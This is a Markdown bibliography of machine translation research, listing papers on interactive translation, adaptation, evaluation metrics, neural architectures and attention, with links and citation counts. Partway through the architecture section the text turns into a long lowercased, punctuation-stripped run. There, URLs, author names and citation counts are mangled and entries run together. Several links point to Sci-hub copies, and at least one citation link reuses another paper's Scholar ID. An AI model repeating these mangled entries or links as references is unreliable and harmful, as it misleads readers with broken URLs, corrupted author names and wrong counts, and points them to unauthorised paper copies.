* Shahram Khadivi and Hermann Ney. 2008. [Integration of Speech Recognition and Machine Translation in Computer-Assisted Translation](https://sci-hub.tw/10.1109/TASL.2008.2004301). *IEEE Transactions on Audio, Speech, and Language Processing*. ([Citation](https://scholar.google.com/scholar?cites=1690852455408892756&as_sdt=2005&sciodt=0,5): 30)
* Sergio Barrachina, Oliver Bender, Francisco Casacuberta, Jorge Civera, Elsa Cubel, Shahram Khadivi, Antonio L. Lagarda, Hermann Ney, Jesús Tomás, and Enrique Vidal. 2009. [Statistical Approaches to Computer-Assisted Translation](https://www.mitpressjournals.org/doi/abs/10.1162/coli.2008.07-055-R2-06-29). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=17691637682117292572&as_sdt=2005&sciodt=0,5): 207)
* Francisco Casacuberta, Jorge Civera, Elsa Cubel, Antonio L. Lagarda, Guy Lapalme, Elliott Macklovitch, and Enrique Vidal. 2009. [Human Interaction for High-Quality Machine Translation](https://sci-hub.tw/10.1145/1562764.1562798). *Communications of the ACM*. ([Citation](https://scholar.google.com/scholar?cites=6184654159576071790&as_sdt=2005&sciodt=0,5): 49)
* Vicent Alabau, Alberto Sanchis, and Francisco Casacuberta. 2014. [Improving On-line Handwritten Recognition in Interactive Machine Translation](https://sci-hub.tw/10.1016/j.patcog.2013.09.035). *Pattern Recognition*. ([Citation](https://scholar.google.com/scholar?cites=11987123133913382404&as_sdt=2005&sciodt=0,5): 18)
* Shanbo Cheng, Shujian Huang, Huadong Chen, Xin-Yu Dai, and Jiajun Chen. 2016. [PRIMT: A Pick-Revise Framework for Interactive Machine Translation](http://www.aclweb.org/anthology/N16-1148). In *Proceedings of NAACL 2016*. ([Citation](https://scholar.google.com/scholar?cites=3643727460542665178&as_sdt=2005&sciodt=0,5): 9)
* Miguel Domingo, Álvaro Peris, and Francisco Casacuberta. 2018. [Segment-based Interactive-Predictive Machine Translation](https://www.researchgate.net/publication/322275484_Segment-based_interactive-predictive_machine_translation). *Machine Translation*. ([Citation](https://scholar.google.com/scholar?cites=4148585683672959462&as_sdt=2005&sciodt=0,5): 2)

<h4 id="adaptation-smt">Adaptation</h4>

* Pascual Martínez-Gómez, Germán Sanchis-Trilles, and Francisco Casacuberta. 2012. [Online Adaptation Strategies for Statistical Machine Translation in Post-editing Scenarios](https://sci-hub.tw/10.1016/j.patcog.2012.01.011). *Pattern Recognition*. ([Citation](https://scholar.google.com/scholar?cites=9143628035426486873&as_sdt=2005&sciodt=0,5): 40)
* Jesús González-Rubio and Francisco Casacuberta. 2014. [Cost-Sensitive Active Learning for Computer-Assisted Translation](https://sci-hub.tw/10.1016/j.patrec.2013.06.007). *Pattern Recognition Letters*. ([Citation](https://scholar.google.com/scholar?cites=13196627956841822823&as_sdt=2005&sciodt=0,5): 11)
* Antonio L. Lagarda, Daniel Ortiz-Martínez, Vicent Alabau, and Francisco Casacuberta. 2015. [Translating without In-domain Corpus: Machine Translation Post-Editing with Online Learning Techniques](https://sci-hub.tw/10.1016/j.csl.2014.10.004). *Computer Speech & Language*. ([Citation](https://scholar.google.com/scholar?cites=6721510771212778605&as_sdt=2005&sciodt=0,5): 10)
* Germán Sanchis-Trilles and Francisco Casacuberta. 2015. [Improving Translation Quality Stability Using Bayesian Predictive Adaptation](https://sci-hub.tw/10.1016/j.csl.2015.03.001). *Computer Speech & Language*. ([Citation](https://scholar.google.com/scholar?q=improving+translation+quality+stability+using+bayesian+predictive+adaptation): 1)
* Daniel Ortiz-Martínez. 2016. [Online Learning for Statistical Machine Translation](https://www.mitpressjournals.org/doi/full/10.1162/COLI_a_00244). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=4979468821667106694&as_sdt=2005&sciodt=0,5): 13)

<h2 id="evaluation">Evaluation</h2>

* Kishore Papineni, Salim Roukos, Todd Ward, and Wei-Jing Zhu. 2002. [BLEU: a Method for Automatic Evaluation of Machine Translation](http://aclweb.org/anthology/P02-1040). In *Proceedings of ACL 2002*. ([Citation](https://scholar.google.com/scholar?cites=9019091454858686906&as_sdt=2005&sciodt=0,5&hl=en): 8,499)
* Philipp Koehn. 2004. [Statistical Significance Tests for Machine Translation Evaluation](http://www.aclweb.org/anthology/W04-3250). In *Proceedings of EMNLP 2004*. ([Citation](https://scholar.google.com/scholar?cites=6141850486206753388&as_sdt=2005&sciodt=0,5&hl=en): 1,015)
* Satanjeev Banerjee and Alon Lavie. 2005. [METEOR: An Automatic Metric for MT Evaluation with Improved Correlation with Human Judgments](http://aclweb.org/anthology/W05-0909). In *Proceedings of the ACL Workshop on Intrinsic and Extrinsic Evaluation Measures for Machine Translation and/or Summarization*. ([Citation](https://scholar.google.com/scholar?cites=11797833340491598355&as_sdt=2005&sciodt=0,5&hl=en): 1,355)
* Matthew Snover, Bonnie Dorr, Richard Schwartz, Linnea Micciulla, and John Makhoul. 2006. [A Study of Translation Edit Rate with Targeted Human Annotation](http://mt-archive.info/AMTA-2006-Snover.pdf). In *Proceedings of AMTA 2006*. ([Citation](https://scholar.google.com/scholar?cites=1809540661740640949&as_sdt=2005&sciodt=0,5&hl=en): 1,713)
* Maja Popović. 2015. [chrF: character n-gram F-score for automatic MT evaluation](http://aclweb.org/anthology/W15-3049). In *Proceedings of WMT 2015*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=12169100229181212462): 58)
* Xin Wang, Wenhu Chen, Yuan-Fang Wang, and William Yang Wang. 2018. [No Metrics Are Perfect: Adversarial Reward Learning for Visual Storytelling](http://aclweb.org/anthology/P18-1083). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=1809540661740640949&as_sdt=2005&sciodt=0,5&hl=en): 10)
* Arun Tejasvi Chaganty, Stephen Mussman, and Percy Liang. 2018. [The price of debiasing automatic metrics in natural language evaluation](https://arxiv.org/pdf/1807.02202). In *Proceedings of ACL 2018*.
* Graham Neubig, Zi-Yi Dou, Junjie Hu, Paul Michel, Danish Pruthi, and Xinyi Wang. 2019. [compare-mt: A Tool for Holistic Comparison of Language Generation Systems](https://arxiv.org/pdf/1903.07926.pdf). In *Proceedings of NAACL 2019*.
* Robert Schwarzenberg, David Harbecke, Vivien Macketanz, Eleftherios Avramidis, and Sebastian Möller. 2019. [Train, Sort, Explain: Learning to Diagnose Translation Models](https://arxiv.org/pdf/1903.12017.pdf). In *Proceedings of NAACL 2019*.
* Nitika Mathur, Timothy Baldwin, and Trevor Cohn. 2019. [Putting Evaluation in Context: Contextual Embeddings Improve Machine Translation Evaluation](https://www.aclweb.org/anthology/P19-1269). In *Proceedings of ACL 2019*.
* Prathyusha Jwalapuram, Shafiq Joty, Irina Temnikova, and Preslav Nakov. 2019. [Evaluating Pronominal Anaphora in Machine Translation: An Evaluation Measure and a Test Suite](https://arxiv.org/pdf/1909.00131). In *Proceedings of ACL 2019*.
* Sergey Edunov, Myle Ott, Marc'Aurelio Ranzato, and Michael Auli. 2020. [On The Evaluation of Machine Translation Systems Trained With Back-Translation](https://arxiv.org/abs/1908.05204). In *Proceedings of ACL 2020*.
* Wei Zhao, Goran Glavaš, Maxime Peyrard, Yang Gao, Robert West, and Steffen Eger. 2020. [On the Limitations of Cross-lingual Encoders as Exposed by Reference-Free Machine Translation Evaluation](http://arxiv.org/abs/2005.01196). In *Proceedings of ACL 2020*.
* Marina Fomicheva, Lucia Specia, and Francisco Guzmán. 2020. [Multi-Hypothesis Machine Translation Evaluation](https://www.aclweb.org/anthology/2020.acl-main.113). In *Proceedings of ACL 2020*.
* Kosuke Takahashi, Katsuhito Sudoh, and Satoshi Nakamura. 2020. [Automatic Machine Translation Evaluation using Source Language Inputs and Cross-lingual Language Model](https://www.aclweb.org/anthology/2020.acl-main.327). In *Proceedings of ACL 2020*.
* Nitika Mathur, Timothy Baldwin, and Trevor Cohn. 2020. [Tangled up in BLEU: Reevaluating the Evaluation of Automatic Machine Translation Evaluation Metrics](https://www.aclweb.org/anthology/2020.acl-main.448). In *Proceedings of ACL 2020*.
* Markus Freitag, David Grangier, and Isaac Caswell. 2020. [BLEU might be Guilty but References are not Innocent](https://www.aclweb.org/anthology/2020.emnlp-main.5). In *Proceedings of EMNLP 2020*.
* Yvette Graham, Barry Haddow, and Philipp Koehn. 2020. [Statistical Power and Translationese in Machine Translation Evaluation](https://www.aclweb.org/anthology/2020.emnlp-main.6). In *Proceedings of EMNLP 2020*.
* Brian Thompson and Matt Post. 2020. [Automatic Machine Translation Evaluation in Many Languages via Zero-Shot Paraphrasing](https://www.aclweb.org/anthology/2020.emnlp-main.8). In *Proceedings of EMNLP 2020*.
* Ricardo Rei, Craig Stewart, Ana C. Farinha, and Alon Lavie. 2020. [COMET: A Neural Framework for MT Evaluation](https://www.aclweb.org/anthology/2020.emnlp-main.213). In *Proceedings of EMNLP 2020*.

<h2 id="neural-machine-translation">Neural Machine Translation</h2>

<h3 id="model-architecture">Model Architecture</h3>

* Nal Kalchbrenner and Phil Blunsom. 2013. [Recurrent Continuous Translation Models](http://aclweb.org/anthology/D13-1176). In *Proceedings of EMNLP 2013*. ([Citation](https://scholar.google.com/scholar?cites=14122455772200752032&as_sdt=2005&sciodt=0,5&hl=en): 623)
* Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. [Sequence to Sequence Learning with Neural Networks](https://papers.nips.cc/paper/5346-sequence-to-sequence-learning-with-neural-networks.pdf). In *Proceedings of NIPS 2014*. ([Citation](https://scholar.google.com/scholar?cites=13133880703797056141&as_sdt=2005&sciodt=0,5&hl=en): 5,452)
* Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. [Neural Machine Translation by Jointly Learning to Align and Translate](https://arxiv.org/pdf/1409.0473). In *Proceedings of ICLR 2015*. ([Citation](https://scholar.google.com/scholar?cites=9430221802571417838&as_sdt=2005&sciodt=0,5&hl=en): 5,596)
* Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean. 2016. [Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation](https://arxiv.org/pdf/1609.08144). In *Proceedings of NIPS 2016*. ([Citation](https://scholar.google.com/scholar?cites=17018428530559089870&as_sdt=2005&sciodt=0,5&hl=en): 1,046)
* Jie Zhou, Ying Cao, Xuguang Wang, Peng Li, and Wei Xu. 2016. [Deep Recurrent Models with Fast-Forward Connections for Neural Machine Translation](http://aclweb.org/anthology/Q16-1027). *Transactions of the Association for Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=2319930273054317494&as_sdt=2005&sciodt=0,5&hl=en): 73)
* Jiatao Gu, Zhengdong Lu, Hang Li, and Victor O.K. Li. 2016. [Incorporating Copying Mechanism in Sequence-to-Sequence Learning](http://aclweb.org/anthology/P16-1154). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com/scholar?cites=6836221883265474919&as_sdt=2005&sciodt=0,5&hl=en): 254)
* Biao Zhang, Deyi Xiong, Jinsong Su, Hong Duan, and Min Zhang. 2016. [Variational Neural Machine Translation](http://aclweb.org/anthology/D16-1050). In *Proceedings of EMNLP 2016*. ([Citation](https://scholar.google.com/scholar?cites=16453011540088245227&as_sdt=2005&sciodt=0,5&hl=en): 38)
* Nal Kalchbrenner, Lasse Espeholt, Karen Simonyan, Aaron van den Oord, Alex Graves, and Koray Kavukcuoglu. 2016. [Neural Machine Translation in Linear Time](https://arxiv.org/pdf/1610.10099). arXiv:1610.10099. ([Citation](https://scholar.google.com/scholar?cites=13142156854384740601&as_sdt=5,39&sciodt=0,39&hl=en): 189)
* Jonas Gehring, Michael Auli, David Grangier, Denis Yarats, and Yann N. Dauphin. 2017. [Convolutional Sequence to Sequence Learning](https://arxiv.org/pdf/1705.03122.pdf). In *Proceedings of ICML 2017*. ([Citation](https://scholar.google.com/scholar?cites=9032432574575787905&as_sdt=2005&sciodt=0,5&hl=en): 453)
* Jonas Gehring, Michael Auli, David Grangier, and Yann Dauphin. 2017. [A Convolutional Encoder Model for Neural Machine Translation](http://aclweb.org/anthology/P17-1012). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=13078160224216368728&as_sdt=2005&sciodt=0,5&hl=en): 85)
* Mingxuan Wang, Zhengdong Lu, Jie Zhou, and Qun Liu. 2017. [Deep Neural Machine Translation with Linear Associative Unit](http://aclweb.org/anthology/P17-1013). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=13710779557836853910&as_sdt=2005&sciodt=0,5&hl=en): 21)
* Matthias Sperber, Graham Neubig, Jan Niehues, and Alex Waibel. 2017. [Neural Lattice-to-Sequence Models for Uncertain Inputs](http://aclweb.org/anthology/D17-1145). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com/scholar?cites=6601112324222176825&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Denny Britz, Anna Goldie, Minh-Thang Luong, and Quoc Le. 2017. [Massive Exploration of Neural Machine Translation Architectures](http://aclweb.org/anthology/D17-1151). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com/scholar?cites=17797498583666145091&as_sdt=2005&sciodt=0,5&hl=en): 114)
* Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. [Attention is All You Need](https://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf). In *Proceedings of NIPS 2017*. ([Citation](https://scholar.google.com/scholar?cites=2960712678066186980&as_sdt=2005&sciodt=0,5&hl=en): 1,748)
* Yingce Xia, Fei Tian, Lijun Wu, Jianxin Lin, Tao Qin, Nenghai Yu, and Tie-Yan Liu. 2017. [Deliberation Networks: Sequence Generation Beyond One-Pass Decoding](https://papers.nips.cc/paper/6775-deliberation-networks-sequence-generation-beyond-one-pass-decoding.pdf). In *Proceedings of NIPS 2017*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=5359968740795634948): 38)
* Zhaopeng Tu, Yang Liu, Lifeng Shang, Xiaohua Liu, and Hang Li. 2017. [Neural Machine Translation with Reconstruction](https://arxiv.org/pdf/1611.01874). In *Proceedings of AAAI 2017*. ([Citation](https://scholar.google.com/scholar?cites=1310099558617172101&as_sdt=2005&sciodt=0,5&hl=en): 75)
* Lukasz Kaiser, Aidan N. Gomez, and Francois
chollet 2018 depthwise separable convolutions for neural machine translation https openreview net pdf id s1jbcueab in proceedings of iclr 2018 citation https scholar google com scholar cites 7520360878420709403 as sdt 2005 sciodt 0 5 hl en 27 yanyao shen xu tan di he tao qin and tie yan liu 2018 dense information flow for neural machine translation http aclweb org anthology n18 1117 in proceedings of naacl 2018 citation https scholar google com scholar cites 12417301759540220817 as sdt 2005 sciodt 0 5 hl en 3 wenhu chen guanlin li shuo ren shujie liu zhirui zhang mu li and ming zhou 2018 generative bridging network for neural sequence prediction http aclweb org anthology n18 1154 in proceedings of naacl 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 16479416225427738693 3 mia xu chen orhan firat ankur bapna melvin johnson wolfgang macherey george foster llion jones mike schuster noam shazeer niki parmar ashish vaswani jakob uszkoreit lukasz kaiser zhifeng chen yonghui wu and macduff hughes 2018 the best of both worlds combining recent advances in neural machine translation http aclweb org anthology p18 1008 in proceedings of acl 2018 citation https scholar google com scholar cites 1960239321427735403 as sdt 2005 sciodt 0 5 hl en 22 weiyue wang derui zhu tamer alkhouli zixuan gan and hermann ney 2018 neural hidden markov model for machine translation http aclweb org anthology p18 2060 in proceedings of acl 2018 citation https scholar google com scholar cites 13737032050194395214 as sdt 2005 sciodt 0 5 hl en 3 jingjing gong xipeng qiu shaojing wang and xuanjing huang 2018 information aggregation via dynamic routing for sequence encoding http aclweb org anthology c18 1232 in coling 2018 qiang wang fuxue li tong xiao yanyang li yinqiao li and jingbo zhu 2018 multi layer representation fusion for neural machine translation http aclweb org anthology c18 1255 in proceedings of coling 2018 yachao li junhui li and min zhang 2018 adaptive weighting for 
neural machine translation http aclweb org anthology c18 1257 in proceedings of coling 2018 kaitao song xu tan di he jianfeng lu tao qin and tie yan liu 2018 double path networks for sequence to sequence learning http aclweb org anthology c18 1259 in proceedings of coling 2018 zi yi dou zhaopeng tu xing wang shuming shi and tong zhang 2018 exploiting deep representations for neural machine translation http aclweb org anthology d18 1457 in proceedings of emnlp 2018 citation https scholar google com scholar cites 8760242283445305561 as sdt 2005 sciodt 0 5 hl en 1 biao zhang deyi xiong jinsong su qian lin and huiji zhang 2018 simplifying neural machine translation with addition subtraction twin gated recurrent networks http aclweb org anthology d18 1459 in proceedings of emnlp 2018 gongbo tang mathias m ller annette rios and rico sennrich 2018 why self attention a targeted evaluation of neural machine translation architectures http aclweb org anthology d18 1458 in proceedings of emnlp 2018 citation https scholar google com scholar cites 8994080673363827758 as sdt 2005 sciodt 0 5 hl en 6 ke tran arianna bisazza and christof monz 2018 the importance of being recurrent for modeling hierarchical structure http aclweb org anthology d18 1503 in proceedings of emnlp 2018 citation https scholar google com scholar cites 16387948292048936516 as sdt 2005 sciodt 0 5 hl en 6 parnia bahar christopher brix and hermann ney 2018 towards two dimensional sequence to sequence model in neural machine translation http aclweb org anthology d18 1335 in proceedings of emnlp 2018 citation https scholar google com scholar cites 4611047151878523903 as sdt 2005 sciodt 0 5 hl en 1 tianyu he xu tan yingce xia di he tao qin zhibo chen and tie yan liu 2018 layer wise coordination between encoder and decoder for neural machine translation http papers nips cc paper 8019 layer wise coordination between encoder and decoder for neural machine translation pdf in proceedings of neurips 2018 citation https 
scholar google com scholar cites 14258883426797488339 as sdt 2005 sciodt 0 5 hl en 2 harshil shah and david barber 2018 generative neural machine translation http papers nips cc paper 7409 generative neural machine translation pdf in proceedings of neurips 2018 hany hassan anthony aue chang chen vishal chowdhary jonathan clark christian federmann xuedong huang marcin junczys dowmunt william lewis mu li shujie liu tie yan liu renqian luo arul menezes tao qin frank seide xu tan fei tian lijun wu shuangzhi wu yingce xia dongdong zhang zhirui zhang and ming zhou 2018 achieving human parity on automatic chinese to english news translation https www microsoft com en us research uploads prod 2018 03 final achieving human pdf technical report microsoft ai research citation https scholar google com scholar cites 3670312788898741170 as sdt 2005 sciodt 0 5 hl en 41 yikang shen shawn tan alessandro sordoni and aaron courville 2019 ordered neurons integrating tree structures into recurrent neural networks https openreview net pdf id b1l6qir5f7 in proceedings of iclr 2019 felix wu angela fan alexei baevski yann dauphin and michael auli 2019 pay less attention with lightweight and dynamic convolutions https openreview net pdf id skvhlh09tx in proceedings of iclr 2019 citation https scholar google com scholar um 1 ie utf 8 lr cites 3358231780148394025 1 mostafa dehghani stephan gouws oriol vinyals jakob uszkoreit lukasz kaiser 2019 universal transformers https openreview net pdf id hyzdrir9y7 in proceedings of iclr 2019 citation https scholar google com scholar cites 8443376534582904234 as sdt 2005 sciodt 0 5 hl en 12 zi yi dou zhaopeng tu xing wang longyue wang shuming shi and tong zhang 2019 dynamic layer aggregation for neural machine translation with routing by agreement https arxiv org pdf 1902 05770 pdf in proceedings of aaai 2019 zihang dai zhilin yang yiming yang jaime carbonell quoc v le and ruslan salakhutdinov 2019 transformer xl attentive language models beyond a fixed 
length context https arxiv org pdf 1901 02860 in proceedings of acl 2019 citation https scholar google com scholar um 1 ie utf 8 lr cites 7150055013029036741 8 qipeng guo xipeng qiu pengfei liu yunfan shao xiangyang xue and zheng zhang 2019 star transformer https arxiv org pdf 1902 09113 pdf in proceedings of naacl 2019 sho takase and naoaki okazaki 2019 positional encoding to control output sequence length https arxiv org pdf 1904 07418 pdf in proceedings of naacl 2019 jian li baosong yang zi yi dou xing wang michael r lyu and zhaopeng tu 2019 information aggregation for multi head attention with routing by agreement https arxiv org pdf 1904 03100 pdf in proceedings of naacl 2019 baosong yang longyue wang derek wong lidia s chao and zhaopeng tu 2019 convolutional self attention networks https arxiv org pdf 1904 03107 pdf in proceedings of naacl 2019 jie hao xing wang baosong yang longyue wang jinfeng zhang and zhaopeng tu 2019 modeling recurrence for transformer https arxiv org pdf 1904 03092 pdf in proceedings of naacl 2019 nikolaos pappas and james henderson 2019 deep residual output layers for neural language generation https arxiv org pdf 1905 05513 pdf in proceedings of icml 2019 david r so chen liang and quoc v le 2019 the evolved transformer https arxiv org pdf 1901 11117 in proceedings of icml 2019 ben peters vlad niculae and andr f t martins 2019 sparse sequence to sequence models https arxiv org pdf 1905 05702 in proceedings of acl 2019 roberto dess and marco baroni 2019 cnns found to jump around more skillfully than rnns compositional generalization in seq2seq convolutional networks https arxiv org pdf 1905 08527 in proceedings of acl 2019 sainbayar sukhbaatar edouard grave piotr bojanowski and armand joulin 2019 adaptive attention span in transformers https arxiv org pdf 1905 07799 in proceedings of acl 2019 yi tay aston zhang luu anh tuan jinfeng rao shuai zhang shuohang wang jie fu and siu cheung hui 2019 lightweight and efficient neural natural 
language processing with quaternion networks https arxiv org pdf 1906 04393 in proceedings of acl 2019 qiang wang bei li tong xiao jingbo zhu changliang li derek f wong and lidia s chao 2019 learning deep transformer models for machine translation https arxiv org pdf 1906 01787 in proceedings of acl 2019 fengshun xiao jiangtong li hai zhao rui wang and kehai chen 2019 lattice based transformer encoder for neural machine translation https arxiv org pdf 1906 01282 in proceedings of acl 2019 matthias sperber graham neubig ngoc quan pham and alex waibel 2019 self attentional models for lattice inputs https arxiv org pdf 1906 01617 in proceedings of acl 2019 xing wang zhaopeng tu longyue wang and shuming shi 2019 exploiting sentential context for neural machine translation https arxiv org pdf 1906 01268 in proceedings of acl 2019 kris korrel dieuwke hupkes verna dankers and elia bruni 2019 transcoding compositionally using attention to find more generalizable solutions https arxiv org pdf 1906 01234 in proceedings of acl 2019 lijun wu yiren wang yingce xia fei tian fei gao tao qin jianhuang lai and tie yan liu 2019 depth growing for neural machine translation https arxiv org pdf 1907 01968 in proceedings of acl 2019 shaojie bai j zico kolter and vladlen koltun 2019 deep equilibrium models https arxiv org pdf 1909 01377 pdf in proceedings of neurips 2019 gon alo m correia vlad niculae and andr f t martins 2019 adaptively sparse transformers https arxiv org pdf 1909 00015 in proceedings of emnlp 2019 yau shian wang hung yi lee and yun nung chen 2019 tree transformer integrating tree structures into self attention https arxiv org pdf 1909 06639 in proceedings of emnlp 2019 mingxuan wang jun xie zhixing tan jinsong su deyi xiong and lei li 2019 towards linear time neural machine translation with capsule networks https www aclweb org anthology d19 1074 pdf in proceedings of emnlp 2019 biao zhang ivan titov and rico sennrich 2019 improving deep transformer with depth scaled 
initialization and merged attention https www aclweb org anthology d19 1083 pdf in proceedings of emnlp 2019 jiatao gu changhan wang junbo zhao 2019 levenshtein transformer https papers nips cc paper 9297 levenshtein transformer in proceedings of neurips 2019 xin sheng linli xu junliang guo jingchang liu ruoyu zhao and yinlong xu 2020 introvnmt an introspective model for variational neural machine translation https www aaai org ojs index php aaai article view 6411 6267 in proceedings of aaai 2020 jian li xing wang baosong yang shuming shi michael r lyu and zhaopeng tu 2020 neuron interaction based representation composition for neural machine translation https arxiv org abs 1911 09877 in proceedings of aaai 2020 benyou wang donghao zhao christina lioma qiuchi li peng zhang jakob grue simonsen 2020 encoding word order in complex embeddings https openreview net forum id hke wtvtwr in proceedings of iclr 2020 nikita kitaev lukasz kaiser anselm levskaya 2020 reformer the efficient transformer https openreview net forum id rkgnkkhtvb in proceedings of iclr 2020 maha elbayad jiatao gu edouard grave michael auli 2020 depth adaptive transformer https openreview net forum id sjg7khvkph in proceedings of iclr 2020 ofir press noah a smith and omer levy 2020 improving transformer models by reordering their sublayers https arxiv org abs 1911 03864 in proceedings of acl 2020 yekun chai shuo jin and xinwen hou 2020 highway transformer self gating enhanced self attentive networks https arxiv org abs 2004 08178 in proceedings of acl 2020 xiangpeng wei heng yu yue hu yue zhang rongxiang weng and weihua luo 2020 multiscale collaborative deep models for neural machine translation https arxiv org abs 2004 14021 in proceedings of acl 2020 hendra setiawan matthias sperber udhyakumar nallasamy and matthias paulik 2020 variational neural machine translation with normalizing flows http arxiv org abs 2005 13978 in proceedings of acl 2020 xuanqing liu hsiang fu yu inderjit dhillon and cho jui 
hsieh 2020 learning to encode position for transformer with continuous dynamical model https arxiv org abs 2003 09229 in proceedings of icml 2020 ruibin xiong yunchang yang di he kai zheng shuxin zheng chen xing huishuai zhang yanyan lan liwei wang and tie yan liu 2020 on layer normalization in the transformer architecture https arxiv org abs 2002 04745 in proceedings of icml 2020 thomas bachlechner bodhisattwa prasad majumder huanru henry mao garrison w cottrell and julian mcauley 2020 rezero is all you need fast convergence at large depth https arxiv org abs 2003 04887 arxiv 2003 04887 yongjing yin fandong meng jinsong su chulun zhou zhengyuan yang jie zhou and jiebo luo 2020 a novel graph based multi modal fusion encoder for neural machine translation https www aclweb org anthology 2020 acl main 273 in proceedings of acl 2020 arya d mccarthy xian li jiatao gu and ning dong 2020 addressing posterior collapse with mutual information for improved variational neural machine translation https www aclweb org anthology 2020 acl main 753 in proceedings of acl 2020 yong wang longyue wang victor li zhaopeng tu 2020 on the sparsity of neural machine translation models https www aclweb org anthology 2020 emnlp main 78 in proceedings of emnlp 2020 bei li ziyang wang hui liu yufan jiang quan du tong xiao huizhen wang jingbo zhu 2020 shallow to deep training for neural machine translation https www aclweb org anthology 2020 emnlp main 72 in proceedings of emnlp 2020 jianhao yan fandong meng jie zhou 2020 multi unit transformers for neural machine translation https www aclweb org anthology 2020 emnlp main 77 in proceedings of emnlp 2020 xiangpeng wei heng yu yue hu rongxiang weng luxi xing weihua luo 2020 uncertainty aware semantic augmentation for neural machine translation https www aclweb org anthology 2020 emnlp main 216 in proceedings of emnlp 2020 xian li asa cooper stickland yuqing tang xiang kong 2020 deep transformers with latent depth https papers nips cc paper 2020 
file 1325cdae3b6f0f91a1b629307bf2d498 paper pdf in proceedings of neurips 2020 manzil zaheer guru guruganesh kumar avinava dubey joshua ainslie chris alberti santiago ontanon philip pham anirudh ravula qifan wang li yang amr ahmed 2020 big bird transformers for longer sequences https papers nips cc paper 2020 file c8512d142a2d849725f31a9a7a361ab9 paper pdf in proceedings of neurips 2020 shuhao gu jinchao zhang fandong meng yang feng wanying xie jie zhou dong yu 2020 token level adaptive training for neural machine translation https www aclweb org anthology 2020 emnlp main 76 in proceedings of emnlp 2020 yufei wang ian d wood stephen wan mark dras mark johnson 2021 mention flags mf mention flags mf constraining transformer based text generators https aclanthology org 2021 acl long 9 in proceedings of acl 2021 h3 id attention mechanism attention mechanism h3 dzmitry bahdanau kyunghyun cho and yoshua bengio 2015 neural machine translation by jointly learning to align and translate https arxiv org pdf 1409 0473 in proceedings of iclr 2015 citation https scholar google com sg scholar cites 9430221802571417838 as sdt 2005 sciodt 0 5 hl en 5 596 minh thang luong hieu pham and christopher d manning 2015 effective approaches to attention based neural machine translation https arxiv org pdf 1508 04025 in proceedings of emnlp 2015 citation https scholar google com sg scholar cites 12347446836257434866 as sdt 2005 sciodt 0 5 hl en 1 466 shi feng shujie liu nan yang mu li ming zhou and kenny q zhu 2016 improving attention modeling with implicit distortion and fertility for machine translation https www aclweb org anthology c16 1290 in proceedings of coling 2016 citation https scholar google com scholar cites 1624882767342343496 as sdt 2005 sciodt 0 5 hl en 18 haitao mi zhiguo wang and abe ittycheriah 2016 supervised attentions for neural machine translation http aclweb org anthology d16 1249 in proceedings of emnlp 2016 citation https scholar google com sg scholar cites 
16345118068023322142 as sdt 2005 sciodt 0 5 hl en 43 zhouhan lin minwei feng cicero nogueira dos santos mo yu bing xiang bowen zhou and yoshua bengio 2017 a structured self attentive sentence embedding https arxiv org abs 1703 03130 in proceedings of iclr 2017 citation https scholar google com sg scholar cites 3666844900655302515 as sdt 2005 sciodt 0 5 hl en 216 tao shen tianyi zhou guodong long jing jiang shirui pan and chengqi zhang 2018 disan directional self attention network for rnn cnn free language understanding https arxiv org pdf 1709 04696 pdf in proceedings of aaai 2018 citation https scholar google com sg scholar cites 7311258646982866903 as sdt 2005 sciodt 0 5 hl en 60 tao shen tianyi zhou guodong long jing jiang and chengqi zhang 2018 bi directional block self attention for fast and memory efficient sequence modeling https arxiv org abs 1804 00857 in proceedings of iclr 2018 citation https scholar google com sg scholar cites 7203374430207428965 as sdt 2005 sciodt 0 5 hl en 13 tao shen tianyi zhou guodong long jing jiang sen wang chengqi zhang 2018 reinforced self attention network a hybrid of hard and soft attention for sequence modeling https arxiv org abs 1801 10296 in proceedings of ijcai 2018 citation https scholar google com sg scholar cites 3809241292668177959 as sdt 2005 sciodt 0 5 hl en 18 peter shaw jakob uszkorei and ashish vaswani 2018 self attention with relative position representations http aclweb org anthology n18 2074 in proceedings of naacl 2018 citation https scholar google com sg scholar cites 5563767891081728261 as sdt 2005 sciodt 0 5 hl en 24 lesly miculicich werlen nikolaos pappas dhananjay ram and andrei popescu belis 2018 self attentive residual decoder for neural machine translation http aclweb org anthology n18 1124 in proceedings of naacl 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 10357155207431596394 3 xintong li lemao liu zhaopeng tu shuming shi and max meng 2018 target foresight based attention 
